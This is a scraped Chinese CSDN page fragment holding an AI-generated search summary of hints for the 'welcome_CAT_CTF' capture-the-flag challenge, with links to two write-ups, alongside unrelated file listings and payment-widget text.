大数据管理与监控:Cloudera Manager:Sqoop数据导入导出技术.docx
928701255451576jspm健康管理系统h5opd.zip
09-02
928701255451576jspm健康管理系统h5opd.zip
welcome_CAT_CTF
07-28
根据引用\[1\]中的描述,"welcome_CAT_CTF"是一个题目中的关键点,通过控制@的移动和输入j来增加猫币,当猫币大于100000000时可以获得flag。而根据引用\[2\]中的描述,flag可能隐藏在osu游戏的谱面中,需要打开osz文件进行查看。另外,引用\[3\]中提到了一个流量包的解压密码是伪加密的,可以通过修改文件来正常解压。综合这些信息,我无法直接回答"welcome_CAT_CTF"的具体含义或解法,因为缺少相关的引用内容。请提供更多的引用内容或提供更具体的问题,我将尽力帮助您。 #### 引用[.reference_title] - *1* [【nepnep&cat ctf】welcome_CAT_CTF](https://blog.csdn.net/qq_42220888/article/details/128531498)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [NepCTF2022 WP](https://blog.csdn.net/not_code_god/article/details/125883979)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值